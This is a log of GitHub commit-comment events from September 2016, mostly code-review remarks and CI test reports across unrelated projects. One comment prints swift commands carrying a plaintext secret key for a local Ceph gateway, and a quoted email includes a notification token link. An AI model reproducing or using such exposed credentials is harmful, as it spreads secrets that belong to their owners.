{"id":"4606846247","type":"CommitCommentEvent","actor":{"login":"raphw"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19141656,"position":15,"line":14,"path":"src/main/java/org/mockito/internal/progress/SequenceNumber.java","commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-23T06:41:02Z","updated_at":"2016-09-23T06:41:02Z","body":"Less contention. Same outcome, but without blocking."}},"created_at":"2016-09-23T06:41:02Z"}
{"id":"4606847519","type":"CommitCommentEvent","actor":{"login":"huynh-chi-hai"},"repo":{"name":"huynh-chi-hai/haihuynh"},"payload":{"comment":{"id":19141659,"position":null,"line":null,"path":null,"commit_id":"e8d74e78479af10b249ea1cb96b2004d7b51cea3","created_at":"2016-09-23T06:41:28Z","updated_at":"2016-09-23T06:41:28Z","body":"`google-services.json\r\n![hai huynh](https://cloud.githubusercontent.com/assets/18447360/18776431/685a8e3e-8193-11e6-96a3-c5f51eba5d75.png)\r\n`"}},"created_at":"2016-09-23T06:41:28Z"}
{"id":"4606847846","type":"CommitCommentEvent","actor":{"login":"Tahnee74"},"repo":{"name":"Tahnee74/Hello-world"},"payload":{"comment":{"id":19141660,"position":null,"line":null,"path":null,"commit_id":"5a4215d638a6096bc1176bd64eb13f04d0bf37f1","created_at":"2016-09-23T06:41:35Z","updated_at":"2016-09-23T06:41:35Z","body":"Mondo taco"}},"created_at":"2016-09-23T06:41:35Z"}
{"id":"4606849994","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141663,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-23T06:42:19Z","updated_at":"2016-09-23T06:42:19Z","body":"fix_gcc48_ICE (macumber) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1795 of 2368 tests passed, 0 test warnings)\n\n * 573 tests had: AUD diffs.\n * 36 tests had: ERR diffs.\n * 14 tests had: Table big diffs.\n * 37 tests had: EIO diffs.\n * 8 tests had: ESO small diffs.\n * 8 tests had: ESO big diffs.\n * 2 tests had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 3 tests had: MTD diffs.\n * 4 tests had: MTR big diffs.\n * 13 tests had: RDD diffs.\n * 1 test had: MDD diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n * 3 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.8%25-red.svg)</a> \n"}},"created_at":"2016-09-23T06:42:19Z"}
{"id":"4606850717","type":"CommitCommentEvent","actor":{"login":"dhardiman"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19141664,"position":30,"line":45,"path":"MapView/Map/RMConfiguration.m","commit_id":"5d12b057ae9c199794077d0b3daddbeac28b5eb0","created_at":"2016-09-23T06:42:32Z","updated_at":"2016-09-23T06:42:32Z","body":"I think it might be worth having a session specific to the framework here. Might make it easier to debug any connection problems, particularly if this shared session usage might affect requests made in the app."}},"created_at":"2016-09-23T06:42:32Z"}
{"id":"4606851031","type":"CommitCommentEvent","actor":{"login":"jwilsson"},"repo":{"name":"jwilsson/spotify-web-api-php"},"payload":{"comment":{"id":19141665,"position":null,"line":null,"path":null,"commit_id":"ef608297271f0734a3a18b7a5e6ba40c1f41aa7a","created_at":"2016-09-23T06:42:39Z","updated_at":"2016-09-23T06:42:39Z","body":"@affektde You're absolutely right and it's fixed in 13d3b9417f0dc6de959867281ae0e4c9392f9c8d and just released as `1.3.4`. Sorry about that!"}},"created_at":"2016-09-23T06:42:39Z"}
{"id":"4606851288","type":"CommitCommentEvent","actor":{"login":"UnrealAkama"},"repo":{"name":"freddymartinez9/lucyparsons.github.io"},"payload":{"comment":{"id":19141666,"position":16,"line":18,"path":"fullaudit/visualization/process.py","commit_id":"432088d43453d96087d0f82e0d0027adf1ccc8c8","created_at":"2016-09-23T06:42:45Z","updated_at":"2016-09-23T06:42:45Z","body":"this should be row[2]"}},"created_at":"2016-09-23T06:42:45Z"}
{"id":"4606853280","type":"CommitCommentEvent","actor":{"login":"dhardiman"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19141668,"position":96,"line":93,"path":"MapView/Map/RMConfiguration.m","commit_id":"5d12b057ae9c199794077d0b3daddbeac28b5eb0","created_at":"2016-09-23T06:43:24Z","updated_at":"2016-09-23T06:43:24Z","body":"In case it's not done in a later commit, let's delete this. It's in source control so can always retrieve it later."}},"created_at":"2016-09-23T06:43:24Z"}
{"id":"4606855548","type":"CommitCommentEvent","actor":{"login":"JYG0723"},"repo":{"name":"JYG0723/tata"},"payload":{"comment":{"id":19141670,"position":null,"line":null,"path":null,"commit_id":"5ff29f65aa6dfb746d89c2919c8d3c68ef061cd5","created_at":"2016-09-23T06:44:09Z","updated_at":"2016-09-23T06:44:09Z","body":"cool"}},"created_at":"2016-09-23T06:44:09Z"}
{"id":"4606860103","type":"CommitCommentEvent","actor":{"login":"raphw"},"repo":{"name":"mockito/mockito"},"payload":{"comment":{"id":19141684,"position":null,"line":null,"path":null,"commit_id":"9445adac915f17a56383158afa7c1ffdee765479","created_at":"2016-09-23T06:45:37Z","updated_at":"2016-09-23T06:45:37Z","body":"Yes, it does. We use the hot swap capabilities of the VM to add a few lines of code to before each mocked class's methods. Every call then first checks if the current instance is a mock. If this is not the case, nothing changes. If it is the case, the instance calls into the framework for finding out what to do."}},"created_at":"2016-09-23T06:45:37Z"}
{"id":"4606862250","type":"CommitCommentEvent","actor":{"login":"TangShaoxu"},"repo":{"name":"TangShaoxu/clockdemo"},"payload":{"comment":{"id":19141689,"position":null,"line":null,"path":null,"commit_id":"ef16c138d6a84612074a5d5eee20b48454f91d1d","created_at":"2016-09-23T06:46:21Z","updated_at":"2016-09-23T06:46:21Z","body":"just a clock"}},"created_at":"2016-09-23T06:46:21Z"}
{"id":"4606863094","type":"CommitCommentEvent","actor":{"login":"dhardiman"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19141694,"position":9,"line":161,"path":"MapView/Map/RMMarker.m","commit_id":"5d12b057ae9c199794077d0b3daddbeac28b5eb0","created_at":"2016-09-23T06:46:37Z","updated_at":"2016-09-23T06:46:37Z","body":"Always nice to see the back of calls to `dataWithContentsOfURL:` :)"}},"created_at":"2016-09-23T06:46:37Z"}
{"id":"4606863949","type":"CommitCommentEvent","actor":{"login":"lagelalegal"},"repo":{"name":"sebdah/git-pylint-commit-hook"},"payload":{"comment":{"id":19141697,"position":null,"line":null,"path":null,"commit_id":"d82fb72191ecf06e3189c4ce5083d18a7771abad","created_at":"2016-09-23T06:46:52Z","updated_at":"2016-09-23T06:46:52Z","body":"@sandipagarwal  Here, We checking the index.lock file, I'm not  sure it create by our hook, It just check the git process crashed, so we remove the file manually .The index.lock file be created have two reason. first it be by the git process crashed, another the other's process use the current repo's git."}},"created_at":"2016-09-23T06:46:52Z"}
{"id":"4606868107","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"Dirbaio/Durum-Lare"},"payload":{"comment":{"id":19141709,"position":null,"line":null,"path":null,"commit_id":"31280477f34e54224bc550ba743147c256e54e40","created_at":"2016-09-23T06:48:09Z","updated_at":"2016-09-23T06:48:09Z","body":"Legal places will do some examine things, to check whether those people do things during daytime, or their recent activities. Community probably has similar situation, such as drunk, noises, etc.  "}},"created_at":"2016-09-23T06:48:09Z"}
{"id":"4606868324","type":"CommitCommentEvent","actor":{"login":"dpogni"},"repo":{"name":"kevinweber/language-htl"},"payload":{"comment":{"id":19141711,"position":null,"line":null,"path":null,"commit_id":"6c2601786fb54ba56f8c8fd7975e8e66a2894a76","created_at":"2016-09-23T06:48:13Z","updated_at":"2016-09-23T06:48:13Z","body":"yay!"}},"created_at":"2016-09-23T06:48:13Z"}
{"id":"4606869190","type":"CommitCommentEvent","actor":{"login":"sttts"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19141715,"position":30,"line":2010,"path":"test/e2e/framework/util.go","commit_id":"e792d4117d8735784f4d830ad1c9d4f68cfee145","created_at":"2016-09-23T06:48:29Z","updated_at":"2016-09-23T06:48:29Z","body":"It's the shell return code if a command cannot be launched."}},"created_at":"2016-09-23T06:48:29Z"}
{"id":"4606870939","type":"CommitCommentEvent","actor":{"login":"rhlrjv"},"repo":{"name":"spree-contrib/spree_related_products"},"payload":{"comment":{"id":19141718,"position":10,"line":93,"path":"app/models/spree/product_decorator.rb","commit_id":"4c5124b47b0b9005418bd9bf5886bf5cbc6820f7","created_at":"2016-09-23T06:49:05Z","updated_at":"2016-09-23T06:49:05Z","body":"The result, at this point, is an list of products. It does not understand the concept of position. Hence the results from this method will not be ordered by position."}},"created_at":"2016-09-23T06:49:05Z"}
{"id":"4606870953","type":"CommitCommentEvent","actor":{"login":"Marcovljkv"},"repo":{"name":"nicolaspschd/FarmFantasy"},"payload":{"comment":{"id":19141719,"position":null,"line":null,"path":null,"commit_id":"2b43ce38639cac79b01d3d6204cb9e80bd4a6706","created_at":"2016-09-23T06:49:05Z","updated_at":"2016-09-23T06:49:05Z","body":"> ###K#e###l#e ###b#o ###p#r###o#k###r# a### m# e"}},"created_at":"2016-09-23T06:49:05Z"}
{"id":"4606872857","type":"CommitCommentEvent","actor":{"login":"EugeneMcArdle"},"repo":{"name":"MadKingBrutos/KieranBrutonA1"},"payload":{"comment":{"id":19141723,"position":33,"line":110,"path":"KieranBrutonA1.py","commit_id":"9e457eaea57ff2f5c7a72a1fd2287ddb118eef3c","created_at":"2016-09-23T06:49:43Z","updated_at":"2016-09-23T06:49:43Z","body":"do you mean line[3]?"}},"created_at":"2016-09-23T06:49:43Z"}
{"id":"4606873190","type":"CommitCommentEvent","actor":{"login":"Marcovljkv"},"repo":{"name":"nicolaspschd/FarmFantasy"},"payload":{"comment":{"id":19141725,"position":null,"line":null,"path":null,"commit_id":"2b43ce38639cac79b01d3d6204cb9e80bd4a6706","created_at":"2016-09-23T06:49:50Z","updated_at":"2016-09-23T06:49:50Z","body":"Kelle bo prokrame"}},"created_at":"2016-09-23T06:49:50Z"}
{"id":"4606873676","type":"CommitCommentEvent","actor":{"login":"EugeneMcArdle"},"repo":{"name":"MadKingBrutos/KieranBrutonA1"},"payload":{"comment":{"id":19141728,"position":35,"line":112,"path":"KieranBrutonA1.py","commit_id":"9e457eaea57ff2f5c7a72a1fd2287ddb118eef3c","created_at":"2016-09-23T06:50:00Z","updated_at":"2016-09-23T06:50:00Z","body":"and line[3] again..."}},"created_at":"2016-09-23T06:50:00Z"}
{"id":"4606874094","type":"CommitCommentEvent","actor":{"login":"dhardiman"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19141731,"position":38,"line":38,"path":"MapView/Map/NSURLSession+RMUserAgent.m","commit_id":"bae59738f9e43c32630fd33f105a546c53062093","created_at":"2016-09-23T06:50:08Z","updated_at":"2016-09-23T06:50:08Z","body":"Do you want to check the `blockError` here? Might be too early in the morning for me, but if I declare but don't nil-initialise my error variable at the call site, I think you risk leaving the error variable as garbage. I think better to just check `error` and then set it to whatever we have here, nil or otherwise? Same below."}},"created_at":"2016-09-23T06:50:08Z"}
{"id":"4606878067","type":"CommitCommentEvent","actor":{"login":"GregersP"},"repo":{"name":"Septima/qgis-geosearch"},"payload":{"comment":{"id":19141747,"position":5,"line":128,"path":"src/geosearch_dk/searchbox.py","commit_id":"57b5724ab173021a86aec55b9c98bee42b95d6d2","created_at":"2016-09-23T06:51:23Z","updated_at":"2016-09-23T06:51:23Z","body":"Tillader QGIS ikke rigtig hexcolor, hvor der enten er seks eller tre hex-værdier?\r\n\r\nVil så foreslå: ^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$"}},"created_at":"2016-09-23T06:51:23Z"}
{"id":"4606878124","type":"CommitCommentEvent","actor":{"login":"GregersP"},"repo":{"name":"Septima/qgis-geosearch"},"payload":{"comment":{"id":19141748,"position":14,"line":144,"path":"src/geosearch_dk/searchbox.py","commit_id":"57b5724ab173021a86aec55b9c98bee42b95d6d2","created_at":"2016-09-23T06:51:24Z","updated_at":"2016-09-23T06:51:24Z","body":"Se kommentaren om 3 eller 6 hex color ovenfor"}},"created_at":"2016-09-23T06:51:24Z"}
{"id":"4606881722","type":"CommitCommentEvent","actor":{"login":"dhardiman"},"repo":{"name":"OrdnanceSurvey/mapbox-ios-sdk"},"payload":{"comment":{"id":19141752,"position":7,"line":42,"path":"MapView/Map/NSURLSession+RMUserAgent.m","commit_id":"81a22846d49ff6e4ce0158d7fb86a50f3c448371","created_at":"2016-09-23T06:52:26Z","updated_at":"2016-09-23T06:52:26Z","body":"Worth setting `blockError` to something to indicate the timeout?"}},"created_at":"2016-09-23T06:52:26Z"}
{"id":"4606882271","type":"CommitCommentEvent","actor":{"login":"scambra"},"repo":{"name":"activescaffold/active_scaffold"},"payload":{"comment":{"id":19141754,"position":5,"line":215,"path":"lib/active_scaffold/helpers/search_column_helpers.rb","commit_id":"e251beb4efd8525bfb868277514d339a2945797d","created_at":"2016-09-23T06:52:35Z","updated_at":"2016-09-23T06:52:35Z","body":"Never mind, it was raising exception, but previous code wasn't right even exception was not raised, so it was useful to me to discover right way. Also, ActiveScaffold is missing many tests, probably it's not testing this method so you didn't catch error"}},"created_at":"2016-09-23T06:52:35Z"}
{"id":"4606884033","type":"CommitCommentEvent","actor":{"login":"freddymartinez9"},"repo":{"name":"freddymartinez9/lucyparsons.github.io"},"payload":{"comment":{"id":19141758,"position":16,"line":18,"path":"fullaudit/visualization/process.py","commit_id":"432088d43453d96087d0f82e0d0027adf1ccc8c8","created_at":"2016-09-23T06:53:07Z","updated_at":"2016-09-23T06:53:07Z","body":"I set pdb.set_trace and I see this line -> for item in [1, 2]: doesn't return very much data. I think its skipping reading the data so I will mess with this line. \r\n"}},"created_at":"2016-09-23T06:53:07Z"}
{"id":"4606886011","type":"CommitCommentEvent","actor":{"login":"jdubois"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19141762,"position":5,"line":13,"path":"generators/generator-constants.js","commit_id":"c61490f8aef7e99c047685720f7ae5f28f4c4d19","created_at":"2016-09-23T06:53:41Z","updated_at":"2016-09-23T06:53:41Z","body":"Yes, they are old and stable, and I already knew them.\n\nLe 23 sept. 2016 8:10 AM, \"Pascal Grimaud\" <notifications@github.com> a\nécrit :\n\n> @jdubois <https://github.com/jdubois> : I suppose you choose these images\n> because they have a lot of stars+download and because there is no official\n> image for kafka, right ?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jhipster/generator-jhipster/commit/c61490f8aef7e99c047685720f7ae5f28f4c4d19#commitcomment-19141399>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AATVo87l3nJCbLIorkIeOePJ1EPWMwWNks5qs21agaJpZM4KEpDh>\n> .\n>\n"}},"created_at":"2016-09-23T06:53:41Z"}
{"id":"4606889380","type":"CommitCommentEvent","actor":{"login":"huyvu3856"},"repo":{"name":"huyvu3856/kuma"},"payload":{"comment":{"id":19141773,"position":null,"line":null,"path":null,"commit_id":"76eefe0a30c435d6ad953aed979782dc862a4fc1","created_at":"2016-09-23T06:54:41Z","updated_at":"2016-09-23T06:54:41Z","body":"Browse files\r\nbug 957802 - Run two worker threads for KumaScript\r\nRun two web workers, so that KumaScript can make requests while Kuma\r\nis requesting rendering.\r\n master (#3855)\r\n1 parent 17cb644 commit 76eefe0a30c435d6ad953aed979782dc862a4fc1  jwhitlock committed on May 4"}},"created_at":"2016-09-23T06:54:41Z"}
{"id":"4606891442","type":"CommitCommentEvent","actor":{"login":"tang3w"},"repo":{"name":"leancloud/objc-sdk"},"payload":{"comment":{"id":19141777,"position":null,"line":null,"path":null,"commit_id":"25754d2dfe66f90796e8bdf5ef3095f1a3de3975","created_at":"2016-09-23T06:55:18Z","updated_at":"2016-09-23T06:55:18Z","body":"Thank you for your feedback. We have fixed this bug in 3.4.3 yesterday."}},"created_at":"2016-09-23T06:55:18Z"}
{"id":"4606898218","type":"CommitCommentEvent","actor":{"login":"seegy"},"repo":{"name":"f-stibane/hdp-cluster-docker"},"payload":{"comment":{"id":19141797,"position":null,"line":null,"path":null,"commit_id":"5333784101d12d1d500cc1307dee0ead0464108a","created_at":"2016-09-23T06:57:33Z","updated_at":"2016-09-23T06:57:33Z","body":"done done"}},"created_at":"2016-09-23T06:57:33Z"}
{"id":"4606898814","type":"CommitCommentEvent","actor":{"login":"awaisss"},"repo":{"name":"awaisss/meanapp1"},"payload":{"comment":{"id":19141800,"position":null,"line":null,"path":null,"commit_id":"f963bd77d4203a6e3b53ef3bc50c92b7c8fba76c","created_at":"2016-09-23T06:57:47Z","updated_at":"2016-09-23T06:57:47Z","body":"Hello everyone! I am developing a demo app covering basic mean stack concpts"}},"created_at":"2016-09-23T06:57:47Z"}
{"id":"4606901081","type":"CommitCommentEvent","actor":{"login":"wzyuliyang"},"repo":{"name":"wzyuliyang/ceph-note"},"payload":{"comment":{"id":19141802,"position":null,"line":null,"path":null,"commit_id":"71e2f6936da81c60cbb49c13282e3dee449b3f92","created_at":"2016-09-23T06:58:25Z","updated_at":"2016-09-23T06:58:25Z","body":"upload 2 files\r\n```\r\n[root@ceph20 ~]#  swift -A http://127.0.0.1:7480/auth/1.0 -U admin:subuser -K 'TJjf3gTwfKTDPljHjHaP7lsxESgEhKv3XAr5tzDn' upload testbucekt wangyuanyuan.s3cfg \r\nwangyuanyuan.s3cfg\r\n[root@ceph20 ~]#  swift -A http://127.0.0.1:7480/auth/1.0 -U admin:subuser -K 'TJjf3gTwfKTDPljHjHaP7lsxESgEhKv3XAr5tzDn' upload testbucekt yuliyang.s3cfg    \r\nyuliyang.s3cfg\r\n[root@ceph20 ~]#  swift -A http://127.0.0.1:7480/auth/1.0 -U admin:subuser -K 'TJjf3gTwfKTDPljHjHaP7lsxESgEhKv3XAr5tzDn' list testbucekt                                        \r\nwangyuanyuan.s3cfg\r\nyuliyang.s3cfg\r\n```"}},"created_at":"2016-09-23T06:58:25Z"}
{"id":"4606901345","type":"CommitCommentEvent","actor":{"login":"carolinux"},"repo":{"name":"anitagraser/TimeManager"},"payload":{"comment":{"id":19141803,"position":18,"line":301,"path":"timemanagercontrol.py","commit_id":"26daa7a74f8533864ae3f91e942e19ebc0b51ac6","created_at":"2016-09-23T06:58:30Z","updated_at":"2016-09-23T06:58:30Z","body":"@rduivenvoorde I think I missed this the 1st time around - how is this stopped?"}},"created_at":"2016-09-23T06:58:30Z"}
{"id":"4606901912","type":"CommitCommentEvent","actor":{"login":"OHUSAR"},"repo":{"name":"OHUSAR/TIS-test"},"payload":{"comment":{"id":19141807,"position":6,"line":6,"path":"hanoi.c","commit_id":"4916f0146d8acadb38a3a12fb51fc00b2253243a","created_at":"2016-09-23T06:58:40Z","updated_at":"2016-09-23T06:58:40Z","body":"well, obviously this was also an issue"}},"created_at":"2016-09-23T06:58:40Z"}
{"id":"4606902310","type":"CommitCommentEvent","actor":{"login":"RedRadiation"},"repo":{"name":"RedRadiation/Hello-World"},"payload":{"comment":{"id":19141808,"position":null,"line":null,"path":null,"commit_id":"c9872067311ac613c19b3f0b329bfc2891e3830d","created_at":"2016-09-23T06:58:48Z","updated_at":"2016-09-23T06:58:48Z","body":"So how does this work?"}},"created_at":"2016-09-23T06:58:48Z"}
{"id":"4606903381","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19141812,"position":46,"line":99,"path":"2016-02/content/Ward.tex","commit_id":"64085c133e09c6048aab0f496ec9ec614b98fdbf","created_at":"2016-09-23T06:59:08Z","updated_at":"2016-09-23T06:59:08Z","body":"I see you flipped the actual figure :) "}},"created_at":"2016-09-23T06:59:08Z"}
{"id":"4606904181","type":"CommitCommentEvent","actor":{"login":"pst"},"repo":{"name":"skippbox/ansible-cloudstack"},"payload":{"comment":{"id":19141815,"position":15,"line":78,"path":"roles/k8s/templates/k8s-node.j2","commit_id":"d6bc4b26a37b43bc60d4d43530ee1e45d244e791","created_at":"2016-09-23T06:59:23Z","updated_at":"2016-09-23T06:59:23Z","body":"@sebgoa thanks I know, this is exactly the reason why I wanted the new image too. ;)"}},"created_at":"2016-09-23T06:59:23Z"}
{"id":"4606904651","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19141816,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-23T06:59:32Z","updated_at":"2016-09-23T06:59:32Z","body":"I think we need to be documented on the wiki technology of build English dictionary."}},"created_at":"2016-09-23T06:59:32Z"}
{"id":"4606905404","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"TingYiShun/primitive"},"payload":{"comment":{"id":19141818,"position":null,"line":null,"path":null,"commit_id":"9caadaaf0fc28bff585c9657997151c1abfc44c4","created_at":"2016-09-23T06:59:47Z","updated_at":"2016-09-23T06:59:47Z","body":"Legal departments are examine those people who do disorder things. Regularly works are continued, and those annoying people will go to police officer."}},"created_at":"2016-09-23T06:59:47Z"}
{"id":"4606913912","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141854,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-23T07:02:20Z","updated_at":"2016-09-23T07:02:20Z","body":"fix_gcc48_ICE (macumber) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.97%25-green.svg)</a>\n"}},"created_at":"2016-09-23T07:02:20Z"}
{"id":"4606914336","type":"CommitCommentEvent","actor":{"login":"Marcovljkv"},"repo":{"name":"nicolaspschd/FarmFantasy"},"payload":{"comment":{"id":19141857,"position":10,"line":582,"path":"farmFantasy/farmFantasy/frmMain.resx","commit_id":"2b43ce38639cac79b01d3d6204cb9e80bd4a6706","created_at":"2016-09-23T07:02:27Z","updated_at":"2016-09-23T07:02:27Z","body":"Ce changement est un peu useless non ?"}},"created_at":"2016-09-23T07:02:27Z"}
{"id":"4606916681","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19141863,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-23T07:03:11Z","updated_at":"2016-09-23T07:03:11Z","body":"fix_gcc48_ICE (macumber) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T07:03:11Z"}
{"id":"4606918092","type":"CommitCommentEvent","actor":{"login":"pldin601"},"repo":{"name":"hexlet-components/js-pairs"},"payload":{"comment":{"id":19141869,"position":12,"line":24,"path":"src/index.js","commit_id":"3e4b5f0fa5fc5c37fb236aa411d11a2b9a703dae","created_at":"2016-09-23T07:03:36Z","updated_at":"2016-09-23T07:03:36Z","body":"Проблема в том, что мы тестируем пары приводя их к строкам и сравниваем потом строки. Поэтому если кто-то решит вернуть не пару, а сразу строку, то будут пройдены тесты:\r\n\r\nhttps://ru.hexlet.io/code_reviews/3660?submission_id=4948"}},"created_at":"2016-09-23T07:03:36Z"}
{"id":"4606919561","type":"CommitCommentEvent","actor":{"login":"sandipagarwal"},"repo":{"name":"sebdah/git-pylint-commit-hook"},"payload":{"comment":{"id":19141874,"position":null,"line":null,"path":null,"commit_id":"d82fb72191ecf06e3189c4ce5083d18a7771abad","created_at":"2016-09-23T07:04:03Z","updated_at":"2016-09-23T07:04:03Z","body":"@lagelalegal Yes. It definitely exists when we have the two scenarios:\r\n1. A previously crashed/terminated git process.\r\n2. A currently running git process.\r\n\r\nNow, the above code that you have written is within an already running git process, which is the current `git commit` command that was fired.\r\nAnd, due to this, a lock file exists (based on #2 above). Hence, deleting this file during the process is something that we shouldn't do."}},"created_at":"2016-09-23T07:04:03Z"}
{"id":"4606921628","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19141880,"position":30,"line":85,"path":"2016-02/content/Ward.tex","commit_id":"c92c2ff6e8e997bf2d08be6403082a0615189912","created_at":"2016-09-23T07:04:43Z","updated_at":"2016-09-23T07:04:43Z","body":"better to use `\\nth{NUMBER}` - however right now it won't superscript them, but it will work with the template version 0.5 next week."}},"created_at":"2016-09-23T07:04:43Z"}
{"id":"4606922008","type":"CommitCommentEvent","actor":{"login":"callmetim1"},"repo":{"name":"callmetim1/Files1"},"payload":{"comment":{"id":19141883,"position":null,"line":null,"path":null,"commit_id":"97ef0ee63a001f55c79d111e1b0bd5cb8b503753","created_at":"2016-09-23T07:04:50Z","updated_at":"2016-09-23T07:04:50Z","body":"Not able to open file. Possibly due to 'touch' command. "}},"created_at":"2016-09-23T07:04:50Z"}
{"id":"4606924560","type":"CommitCommentEvent","actor":{"login":"robertluo1949"},"repo":{"name":"robertluo1949/myquarkfinance"},"payload":{"comment":{"id":19141888,"position":null,"line":null,"path":null,"commit_id":"0d91c24a8d507b6cb0d8c354930f3c8201512186","created_at":"2016-09-23T07:05:37Z","updated_at":"2016-09-23T07:05:37Z","body":"platform : linux"}},"created_at":"2016-09-23T07:05:37Z"}
{"id":"4606926445","type":"CommitCommentEvent","actor":{"login":"filipKov"},"repo":{"name":"OHUSAR/TIS-test"},"payload":{"comment":{"id":19141900,"position":null,"line":null,"path":null,"commit_id":"613e1bc6871832e18be528effd1bdffd4cfdfc52","created_at":"2016-09-23T07:06:12Z","updated_at":"2016-09-23T07:06:12Z","body":"nekonzistentny preklad....ale co uz"}},"created_at":"2016-09-23T07:06:12Z"}
{"id":"4606927267","type":"CommitCommentEvent","actor":{"login":"jafdy"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19141906,"position":null,"line":null,"path":null,"commit_id":"df6ce0161f0ef6341493b05aae1e4ed8b6797bb5","created_at":"2016-09-23T07:06:29Z","updated_at":"2016-09-23T07:06:29Z","body":"Yay, Inclusiveness, now we don't alienate half the population. "}},"created_at":"2016-09-23T07:06:29Z"}
{"id":"4606927849","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19141914,"position":63,"line":63,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/HttpDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:06:40Z","updated_at":"2016-09-23T07:06:40Z","body":"Got it"}},"created_at":"2016-09-23T07:06:40Z"}
{"id":"4606929341","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19141929,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-23T07:07:08Z","updated_at":"2016-09-23T07:07:08Z","body":"I'll try fix problem with dictionary."}},"created_at":"2016-09-23T07:07:08Z"}
{"id":"4606930635","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19141931,"position":2,"line":1,"path":"src/app/book-monkey/iteration-5/directives/book-list-item/book-list-item.component.html","commit_id":"fb98b9d267815a73ff24e14c36f1f628add73fa0","created_at":"2016-09-23T07:07:33Z","updated_at":"2016-09-23T07:07:33Z","body":"Das ging kaputt weil `book.thumbnails ===  undefined`. Das waren die Testdaten aus unseren Workshops, die dann an der Stelle um die Ohren geflogen sind. "}},"created_at":"2016-09-23T07:07:33Z"}
